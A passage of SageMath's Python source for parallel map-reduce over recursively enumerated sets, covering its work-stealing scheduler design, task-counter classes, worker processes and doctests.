the number of active tasks. The work is complete when it reaches 0.
- ``_done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``_aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted
before all workers ran out of work.
- ``_workers`` -- a list of :class:`RESetMapReduceWorker` objects.
Each worker is identified by its position in this list.
Each **worker** is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker that is its position in the
master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing of nodes of the
worker. It is used as a stack by the worker. Thiefs steal from the bottom of
this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
steal request submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfert node during steal.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of
stealing from ``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal time, that is, when all workers are active, a worker ``W`` is
iterating though a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from
and new nodes ``W._todo`` are appended to ``W._todo``. When a worker ``W``
runs out of work, that is, when ``worker._todo`` is empty, it tries to steal
some work (i.e., a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method.
From the point of view of ``W``, here is what happens:
- ``W`` signals to the master that it is idle: ``master._signal_task_done``;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V``: it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ :exc:`AbortError` is received. This means either that the computation was
aborted or that it simply succeeded and that no more work is required by
``W``. Therefore an :exc:`AbortError` exception is raised leading ``W`` to
shutdown.
We now describe the protocol on the victim's side. Each worker process contains
a :class:`Thread` which we call ``T`` for thief which acts like some kind of
Troyan horse during theft. It is normally blocked waiting for a steal request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time, ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signals to the master that a new task is starting by
``master._signal_task_start``;
- Two things may happen depending if the queue ``V._todo`` is empty or not.
Remark that due to the GIL, there is no parallel execution between the
victim ``V`` and its thief thread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The task is immediately signaled to end the master
through ``master._signal_task_done``.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is, when finished working on the subtree rooted at the node, ``W`` will
call ``master._signal_task_done``.
The end of the computation
--------------------------
To detect when a computation is finished, a synchronized integer is kept which
counts the number of active tasks. This is essentially a semaphore but
semaphores are broken on Darwin OSes so we ship two implementations depending
on the OS (see :class:`ActiveTaskCounter` and :class:`ActiveTaskCounterDarwin`
and the note below).
When a worker finishes working on a task, it calls
``master._signal_task_done``. This decreases the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is completed. The worker executes ``master._shutdown``
which sends :exc:`AbortError` to all ``worker._request`` and
``worker._write_task`` queues. Each worker or thief thread receiving such
a message raises the corresponding exception, therefore stopping its work. A
lock called ``master._done`` ensures that shutdown is only done once.
Finally, it is also possible to interrupt the computation before its ends,
by calling ``master.abort()``. This is achieved by setting
``master._active_tasks`` to 0 and calling ``master._shutdown``.
.. warning:: The macOS Semaphore bug
Darwin OSes do not correctly implement POSIX's semaphore semantic.
Indeed, on these systems, acquire may fail and return False not only when
the semaphore is equal to zero but also **because someone else is trying
to acquire** at the same time. This makes using Semaphores impossible
on macOS so that on these systems we use a synchronized integer instead.
.. _examples:
Are there examples of classes?
------------------------------
Yes! Here they are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using non standard
communication configuration.
Tests
-----
Generating series for the sum of strictly decreasing lists of integers
smaller than 15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots=[([], 0, 0)] + [([i], i, i) for i in range(1, 15)],
....: children=lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i)
....: for i in range(1, list_sum_last[2])],
....: map_function=lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: sg == prod((1 + y**i) for i in range(1, 15))
True
Classes and methods
-------------------
"""
from __future__ import print_function, absolute_import
from threading import Thread
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
import collections
import copy
import sys
import random
import queue
import ctypes
import logging
logger = logging.getLogger(__name__)
logger.__doc__ = (
"""
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
""")
logger.setLevel(logging.WARN)
# logger.setLevel(logging.INFO)
# logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
# Set up a multiprocessing context to use for this modules (using the
# 'fork' method which is basically same as on Python 2)
import multiprocessing as mp
mp = mp.get_context('fork')
def proc_number(max_proc=None):
r"""
Return the number of processes to use.
INPUT:
- ``max_proc`` -- an upper bound on the number of processes or
``None``.
EXAMPLES::
sage: from sage.parallel.map_reduce import proc_number
sage: proc_number() # random
8
sage: proc_number(max_proc=1)
1
sage: proc_number(max_proc=2) in (1, 2)
True
"""
from sage.parallel.ncpus import ncpus
n = ncpus()
if max_proc is None:
return n
else:
return min(max_proc, n)
class AbortError(Exception):
r"""
Exception for aborting parallel computations.
This is used both as exception or as abort message.
TESTS::
sage: from sage.parallel.map_reduce import AbortError
sage: raise AbortError
Traceback (most recent call last):
...
AbortError
"""
pass
class ActiveTaskCounterDarwin(object):
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is essentially a semaphore, but Darwin OSes
do not correctly implement POSIX's semaphore semantic. So we use
a shared integer with a lock.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Value(ctypes.c_int, task_number)
self._lock = mp.Lock()
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.value)
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise increment the counter and returns its value after the
incrementation.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
with self._lock:
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks.value <= 0:
return 0
self._active_tasks.value += 1
return self._active_tasks.value
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
with self._lock:
self._active_tasks.value -= 1
return self._active_tasks.value
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounterDarwin as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
with self._lock:
self._active_tasks.value = 0
class ActiveTaskCounterPosix(object):
r"""
Handling the number of active tasks.
A class for handling the number of active tasks in a distributed
computation process. This is the standard implementation on POSIX
compliant OSes. We essentially wrap a semaphore.
.. note::
A legitimate question is whether there is a need in keeping the two
implementations. I ran the following experiment on my machine::
S = RecursivelyEnumeratedSet(
[[]],
lambda l: ([l[:i] + [len(l)] + l[i:]
for i in range(len(l) + 1)]
if len(l) < NNN else []),
structure='forest',
enumeration='depth')
%time sp = S.map_reduce(lambda z: x**len(z)); sp
For NNN = 10, averaging a dozen of runs, I got:
- Posix compliant implementation: 17.04 s
- Darwin implementation: 18.26 s
So there is a non negligible overhead. It will probably be worth it
if we try to cythonize the code. So I'm keeping both implementations.
"""
def __init__(self, task_number):
r"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: t = ATC(4)
sage: TestSuite(t).run(skip="_test_pickling", verbose=True)
running ._test_new() . . . pass
"""
self._active_tasks = mp.Semaphore(task_number)
def __repr__(self):
"""
TESTS::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: ATC(4)
ActiveTaskCounter(value=4)
"""
return "ActiveTaskCounter(value=%s)" % (self._active_tasks.get_value())
def task_start(self):
r"""
Increment the task counter by one.
OUTPUT:
Calling :meth:`task_start` on a zero or negative counter returns 0,
otherwise it increments the counter and returns its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_start()
5
sage: c
ActiveTaskCounter(value=5)
Calling :meth:`task_start` on a zero counter does nothing::
sage: c = ATC(0)
sage: c.task_start()
0
sage: c
ActiveTaskCounter(value=0)
"""
logger.debug("_signal_task_start called")
# The following test is not necessary but is allows active thieves to
# stop before receiving the poison pill.
if self._active_tasks._semlock._is_zero():
return 0
self._active_tasks.release()
return self._active_tasks.get_value()
task_start.__doc__ = ActiveTaskCounterDarwin.task_start.__doc__
def task_done(self):
r"""
Decrement the task counter by one.
OUTPUT:
Calling :meth:`task_done` decrements the counter and returns
its new value.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.task_done()
3
sage: c
ActiveTaskCounter(value=3)
sage: c = ATC(0)
sage: c.task_done()
-1
"""
logger.debug("_signal_task_done called")
# We test if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so it is needed.
if not self._active_tasks.acquire(False):
return -1
return self._active_tasks.get_value()
def abort(self):
r"""
Set the task counter to zero.
EXAMPLES::
sage: from sage.parallel.map_reduce import ActiveTaskCounter as ATC
sage: c = ATC(4); c
ActiveTaskCounter(value=4)
sage: c.abort()
sage: c
ActiveTaskCounter(value=0)
"""
while self._active_tasks.acquire(False):
pass
ActiveTaskCounter = (ActiveTaskCounterDarwin if sys.platform == 'darwin'
else ActiveTaskCounterPosix)
# ActiveTaskCounter = ActiveTaskCounterDarwin # to debug Darwin implementation
class RESetMapReduce(object):
r"""
Map-Reduce on recursively enumerated sets.
INPUT:
Description of the set:
- either ``forest=f`` -- where ``f`` is a :class:`RecursivelyEnumeratedSet_forest>`
- or a triple ``roots, children, post_process`` as follows
- ``roots=r`` -- The root of the enumeration
- ``children=c`` -- a function iterating through children nodes,
given a parent node
- ``post_process=p`` -- a post-processing function
The option ``post_process`` allows for customizing the nodes that
are actually produced. Furthermore, if ``post_process(x)`` returns ``None``,
then ``x`` won't be output at all.
Description of the map/reduce operation:
- ``map_function=f`` -- (default to ``None``)
- ``reduce_function=red`` -- (default to ``None``)
- ``reduce_init=init`` -- (default to ``None``)
.. SEEALSO::
:mod:`the Map/Reduce module <sage.parallel.map_reduce>` for
details and examples.
"""
def __init__(self,
roots=None,
children=None,
post_process=None,
map_function=None,
reduce_function=None,
reduce_init=None,
forest=None):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: R = RESetMapReduce([[]], lambda: [[]])
sage: R
<sage.parallel.map_reduce.RESetMapReduce object at 0x...>
To silence the coverage checker::
sage: TestSuite(R).run(skip=['_test_pickling'])
"""
if forest is not None:
if not all(x is None for x in (roots, children, post_process)):
raise ValueError("forest arg is incompatible with roots, children and post_process")
self._forest = forest
self._roots = forest._roots
self.children = forest.children
if hasattr(forest, 'post_process'):
self.post_process = forest.post_process
else:
if roots is not None: self._roots = roots
if children is not None: self.children = children
if post_process is not None: self.post_process = post_process
if map_function is not None: self.map_function = map_function
if reduce_function is not None: self.reduce_function = reduce_function
if reduce_init is not None: self._reduce_init = reduce_init
self._profile = None
@lazy_attribute
def _forest(self):
r"""
Return the forest underlying the map-reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample()
sage: f = EX._forest; f
An enumerated set with a forest structure
sage: f.an_element()
[]
"""
return RecursivelyEnumeratedSet(
self.roots(),
self.children,
post_process=self.post_process,
structure='forest',
enumeration='depth')
def roots(self):
r"""
Return the roots of ``self``.
OUTPUT:
An iterable of nodes.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(42)
sage: S.roots()
42
"""
return self._roots
def map_function(self, o):
r"""
Return the function mapped by ``self``.
INPUT:
- ``o`` -- a node
OUTPUT:
By default ``1``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.map_function(7)
1
sage: S = RESetMapReduce(map_function = lambda x: 3*x + 5)
sage: S.map_function(7)
26
"""
return 1
def reduce_function(self, a, b):
r"""
Return the reducer function for ``self``.
INPUT:
- ``a``, ``b`` -- two values to be reduced
OUTPUT:
By default the sum of ``a`` and ``b``.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_function(4, 3)
7
sage: S = RESetMapReduce(reduce_function=lambda x,y: x*y)
sage: S.reduce_function(4, 3)
12
"""
return a+b
def post_process(self, a):
r"""
Return the image of ``a`` under the post-processing function for ``self``.
INPUT:
- ``a`` -- a node
With the default post-processing function, which is the identity function,
this returns ``a`` itself.
.. note:: This should be overloaded in applications.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.post_process(4)
4
sage: S = RESetMapReduce(post_process=lambda x: x*x)
sage: S.post_process(4)
16
"""
return a
_reduce_init = 0
def reduce_init(self):
r"""
Return the initial element for a reduction.
.. note:: This should be overloaded in applications.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.reduce_init()
0
sage: S = RESetMapReduce(reduce_init = 2)
sage: S.reduce_init()
2
"""
return copy.copy(self._reduce_init)
def setup_workers(self, max_proc=None, reduce_locally=True):
r"""
Setup the communication channels.
INPUT:
- ``max_proc`` -- (integer) an upper bound on the number of
worker processes.
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: S._results
<multiprocessing.queues.Queue object at 0x...>
sage: len(S._workers)
2
"""
self._nprocess = proc_number(max_proc)
self._results = mp.Queue()
self._active_tasks = ActiveTaskCounter(self._nprocess)
self._done = mp.Lock()
self._aborted = mp.Value(ctypes.c_bool, False)
sys.stdout.flush()
sys.stderr.flush()
self._workers = [RESetMapReduceWorker(self, i, reduce_locally)
for i in range(self._nprocess)]
def start_workers(self):
r"""
Launch the workers.
The workers should have been created using :meth:`setup_workers`.
TESTS::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: def children(x):
....: sleep(0.5)
....: return []
sage: S = RESetMapReduce(roots=[1], children=children)
sage: S.setup_workers(2)
sage: S.start_workers()
sage: all(w.is_alive() for w in S._workers)
True
sage: sleep(1)
sage: all(not w.is_alive() for w in S._workers)
True
Cleanup::
sage: S.finish()
"""
if self._nprocess == 0:
raise ValueError("No process connected")
logger.info("Starting work with %s processes", self._nprocess)
logger.debug("Distributing tasks")
for i, task in enumerate(self.roots()):
self._workers[i % len(self._workers)]._todo.append(task)
logger.debug("Starting processes")
sys.stdout.flush()
sys.stderr.flush()
for w in self._workers: w.start()
def get_results(self, timeout=None):
r"""
Get the results from the queue.
OUTPUT:
The reduction of the results of all the workers, that is, the result of
the map/reduce computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce()
sage: S.setup_workers(2)
sage: for v in [1, 2, None, 3, None]: S._results.put(v)
sage: S.get_results()
6
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
res = self.reduce_init()
active_proc = self._nprocess
while active_proc > 0:
try:
logger.debug('Waiting on results; active_proc: %s, '
'timeout: %s, aborted: %s' %
(active_proc, timeout, self._aborted.value))
newres = self._results.get(timeout=timeout)
except queue.Empty:
logger.debug('Timed out waiting for results; aborting')
# If we timed out here then the abort timer should have
# already fired, but just in case it didn't (or is in
# progress) wait for it to finish
self._timer.join()
return
if newres is not None:
logger.debug("Got one result")
res = self.reduce_function(res, newres)
else:
active_proc -= 1
return res
def finish(self):
r"""
Destroy the workers and all the communication objects.
Communication statistics are gathered before destroying the workers.
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=5)
sage: S.setup_workers(2) # indirect doctest
sage: S._workers[0]._todo.append([])
sage: for w in S._workers: w.start()
sage: _ = S.get_results()
sage: S._shutdown()
sage: S.print_communication_statistics()
Traceback (most recent call last):
...
AttributeError: 'RESetMPExample' object has no attribute '_stats'
sage: S.finish()
sage: S.print_communication_statistics()
#proc: ...
...
sage: _ = S.run() # cleanup
.. SEEALSO:: :meth:`print_communication_statistics`
"""
if not self._aborted.value:
logger.debug("Joining worker processes...")
for worker in self._workers:
logger.debug("Joining %s" % worker.name)
worker.join()
logger.debug("Joining done")
else:
logger.debug("Killing worker processes...")
for worker in self._workers:
logger.debug("Terminating %s" % worker.name)
worker.terminate()
logger.debug("Killing done")
del self._results, self._active_tasks, self._done
self._get_stats()
del self._workers
def abort(self):
r"""
Abort the current parallel computation.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator([[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 17 else [])
sage: it = iter(S)
sage: next(it) # random
[]
sage: S.abort()
sage: hasattr(S, 'work_queue')
False
Cleanup::
sage: S.finish()
"""
logger.info("Abort called")
self._aborted.value = True
self._active_tasks.abort()
self._shutdown()
def _shutdown(self):
r"""
Shutdown the workers.
Sends a poison pill to all workers and their thief thread.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: for w in S._workers: w.start()
sage: S._shutdown()
Cleanup::
sage: S.finish()
"""
if self._done.acquire(False):
logger.debug("***************** FINISHED ******************")
logger.debug("Sending poison pills")
for worker in self._workers:
worker._request.put(AbortError)
for worker in self._workers:
worker._write_task.send(AbortError)
def _signal_task_start(self):
r"""
Signal a starting task.
Used by the worker to signal that a new task is starting. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator( [[]],
....: lambda l: [l+[0], l+[1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_start()
sage: S._active_tasks
ActiveTaskCounter(value=3)
Signaling one time too many raises an :exc:`AbortError`::
sage: S._signal_task_done()
sage: S._signal_task_done()
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
"""
if self._active_tasks.task_start() == 0:
raise AbortError
def _signal_task_done(self):
r"""
Signal a task is done.
Used by the worker to signal that a task is done. As soon as
there are no more active task, the work is done, in which case an
:exc:`AbortError` is raised.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetParallelIterator
sage: S = RESetParallelIterator(
....: [[]],
....: lambda l: [l + [0], l + [1]] if len(l) < 20 else [])
sage: S.setup_workers(2)
sage: S._active_tasks
ActiveTaskCounter(value=2)
sage: S._signal_task_done()
sage: S._active_tasks
ActiveTaskCounter(value=1)
sage: S._signal_task_done()
Traceback (most recent call last):
...
AbortError
Cleanup::
sage: del S._results, S._active_tasks, S._done, S._workers
"""
# We test if the semaphore counting the number of active tasks is
# becoming negative. This should not happen in normal
# computations. However, in case of abort, we artificially put the
# semaphore to 0 to stop the computation so that it is needed.
if self._active_tasks.task_done() <= 0:
logger.debug("raising AbortError")
self._shutdown()
raise AbortError
def random_worker(self):
r"""
Return a random worker.
OUTPUT:
A worker for ``self`` chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: EX.random_worker()
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
sage: EX.random_worker() in EX._workers
True
Cleanup::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
victim = random.randint(0, len(self._workers)-1)
return self._workers[victim]
def run(self,
max_proc=None,
reduce_locally=True,
timeout=None,
profile=None):
r"""
Run the computations.
INPUT:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``reduce_locally`` -- See :class:`RESetMapReduceWorker` (default: ``True``)
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``profile`` -- directory/filename prefix for profiling, or ``None``
for no profiling (default: ``None``)
OUTPUT:
The result of the map/reduce computation or an exception
:exc:`AbortError` if the computation was interrupted or timeout.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 8)
sage: EX.run()
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: from sage.parallel.map_reduce import AbortError
sage: EX = RESetMPExample(maxl = 8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
self._profile=profile
self.setup_workers(max_proc, reduce_locally)
self.start_workers()
if timeout is not None:
from threading import Timer
self._timer = Timer(timeout, self.abort)
self._timer.start()
self.result = self.get_results(timeout=timeout)
if timeout is not None:
self._timer.cancel()
logger.info("Returning")
self.finish()
if self._aborted.value:
raise AbortError
else:
return self.result
def _get_stats(self):
r"""
Gather the communication statistics at the end of a run.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run() # indirect doctest
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
res = []
for i in range(self._nprocess):
res.append(tuple(self._workers[i]._stats))
self._stats = res
def print_communication_statistics(self, blocksize=16):
r"""
Print the communication statistics in a nice way.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: S = RESetMPExample(maxl=6)
sage: S.run()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
sage: S.print_communication_statistics() # random
#proc: 0 1 2 3 4 5 6 7
reqs sent: 5 2 3 11 21 19 1 0
reqs rcvs: 10 10 9 5 1 11 9 2
- thefs: 1 0 0 0 0 0 0 0
+ thefs: 0 0 1 0 0 0 0 0
"""
res = [""] # classic trick to have a local variable shared with the
# local function (see e.g:
# https://stackoverflow.com/questions/2609518/python-nested-function-scopes).
def pstat(name, start, end, ist):
res[0] += ("\n" + name + " ".join(
"%4i" % (self._stats[i][ist]) for i in range(start, end)))
for start in range(0, self._nprocess, blocksize):
end = min(start+blocksize, self._nprocess)
res[0] = ("#proc: " +
" ".join("%4i" % (i) for i in range(start, end)))
pstat("reqs sent: ", start, end, 0)
pstat("reqs rcvs: ", start, end, 1)
pstat("- thefs: ", start, end, 2)
pstat("+ thefs: ", start, end, 3)
print(res[0])
def run_serial(self):
r"""
Run the computation serially (mostly for tests).
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample
sage: EX = RESetMPExample(maxl = 4)
sage: EX.run_serial()
24*x^4 + 6*x^3 + 2*x^2 + x + 1
"""
import functools
return functools.reduce(self.reduce_function,
(self.map_function(x) for x in self._forest),
self.reduce_init())
class RESetMapReduceWorker(mp.Process):
"""
Worker for generate-map-reduce.
This shouldn't be called directly, but instead created by
:meth:`RESetMapReduce.setup_workers`.
INPUT:
- ``mapred`` -- the instance of :class:`RESetMapReduce` for which
this process is working.
- ``iproc`` -- the id of this worker.
- ``reduce_locally`` -- when reducing the results. Three possible values
are supported:
* ``True`` -- means the reducing work is done all locally, the result is
only sent back at the end of the work. This ensure the lowest level of
communication.
* ``False`` -- results are sent back after each finished branches, when
the process is asking for more work.
"""
def __init__(self, mapred, iproc, reduce_locally):
r"""
TESTS::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample()
sage: RESetMapReduceWorker(EX, 200, True)
<RESetMapReduceWorker(RESetMapReduceWorker-..., initial)>
"""
mp.Process.__init__(self)
self._iproc = iproc
self._todo = collections.deque()
self._request = mp.SimpleQueue() # Faster than Queue
# currently this is not possible to have to simultaneous read or write
# on the following Pipe. So there is no need to have a queue.
self._read_task, self._write_task = mp.Pipe(duplex=False)
self._mapred = mapred
self._stats = mp.RawArray('i', 4)
self._reduce_locally = reduce_locally
def _thief(self):
r"""
Return the thief thread of this worker process.
"""
logger.debug("Thief started")
reqs = 0
thefts = 0
try:
for ireq in iter(self._request.get, AbortError):
reqs +=1
target = self._mapred._workers[ireq]
logger.debug("Got a Steal request from %s" % target.name)
self._mapred._signal_task_start()
try:
work = self._todo.popleft()
except IndexError:
target._write_task.send(None)
logger.debug("Failed Steal %s" % target.name)
self._mapred._signal_task_done()
else:
target._write_task.send(work)
logger.debug("Succesful Steal %s" % target.name)
thefts += 1
except AbortError:
logger.debug("Thief aborted")
else:
logger.debug("Thief received poison pill")
if self._mapred._aborted.value: # Computation was aborted
self._todo.clear()
else: # Check that there is no remaining work
assert len(self._todo) == 0, "Bad stop the result may be wrong"
self._stats[1] = reqs
self._stats[2] = thefts
logger.debug("Thief Exiting")
def steal(self):
r"""
Steal some node from another worker.
OUTPUT:
A node stolen from another worker chosen at random.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: from threading import Thread
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(2)
sage: w0, w1 = EX._workers
sage: w0._todo.append(42)
sage: thief0 = Thread(target = w0._thief, name="Thief")
sage: thief0.start() # known bug (Trac #27537)
sage: w1.steal() # known bug (Trac #27537)
42
sage: w0._todo # known bug (Trac #27537)
deque([])
"""
self._mapred._signal_task_done()
node = None
while node is None:
victim = self._mapred.random_worker()
if victim is not self:
logger.debug("Trying to steal from %s" % victim.name)
victim._request.put(self._iproc)
self._stats[0] += 1
logger.debug("waiting for steal answer from %s" % victim.name)
node = self._read_task.recv()
# logger.debug("Request answer: %s" % (node,))
if node is AbortError:
raise AbortError
# logger.debug("Received a stolen node: %s" % (node,))
self._stats[3] += 1
return node
def run(self):
r"""
The main function executed by the worker.
Calls :meth:`run_myself` after possibly setting up parallel profiling.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
sage: del EX._results, EX._active_tasks, EX._done, EX._workers
"""
profile = self._mapred._profile
if profile is not None:
import cProfile
PROFILER = cProfile.Profile()
PROFILER.runcall(self.run_myself)
output = profile + str(self._iproc)
logger.warn("Profiling in %s ..." % output)
PROFILER.dump_stats(output)
else:
self.run_myself()
def run_myself(self):
r"""
The main function executed by the worker.
EXAMPLES::
sage: from sage.parallel.map_reduce import RESetMPExample, RESetMapReduceWorker
sage: EX = RESetMPExample(maxl=6)
sage: EX.setup_workers(1)
sage: w = EX._workers[0]
sage: w._todo.append(EX.roots()[0])
sage: w.run_myself()
sage: sleep(1)
sage: w._todo.append(None)
sage: EX.get_results()
720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
Cleanups::
